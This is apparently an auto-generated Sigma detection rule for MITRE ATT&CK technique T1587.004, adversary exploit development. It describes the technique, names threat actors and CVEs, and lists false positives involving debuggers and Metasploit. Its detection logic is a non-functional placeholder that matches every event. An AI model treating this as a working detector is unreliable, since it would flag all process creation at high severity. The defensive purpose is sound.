title: Exploits (T1587.004)
id: df00tech-t1587-004
status: experimental
description: "Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits. Adversaries may use information acquired via Vulnerabilities (T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis. Documented threat actors leveraging this technique include Volt Typhoon (zero-day initial access), UNC3886 (CVE-2022-41328 FortiOS and CVE-2023-34048 VMware vCenter), and Leviathan, which rapidly adapts public PoC code for new vulnerabilities. Because this is a PRE-technique, the adversary action (exploit development) occurs outside the target environment — detection focuses on identifying exploit development tooling appearing on monitored endpoints, downstream exploitation artifacts, and fuzzing activity against internal services."
references:
  - https://attack.mitre.org/techniques/T1587/004/
  - https://df00tech.com/detections/T1587.004
author: df00tech
date: 2026/04/13
tags:
  - attack.t1587.004
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - Authorized red team and penetration testers running these tools as part of a sanctioned engagement — cross-reference against your security testing register and approved device list
  - Software developers using WinDbg or x64dbg for legitimate application debugging and crash analysis on developer workstations
  - Security engineers building and testing detection rules using Metasploit or msfvenom against isolated lab environments
  - CTF (Capture The Flag) participants or security training students running exploit development labs on endpoints enrolled in the tenant
  - "Security operations tooling (SIEM content development, detection validation) that invokes these tools programmatically in a controlled manner"
level: high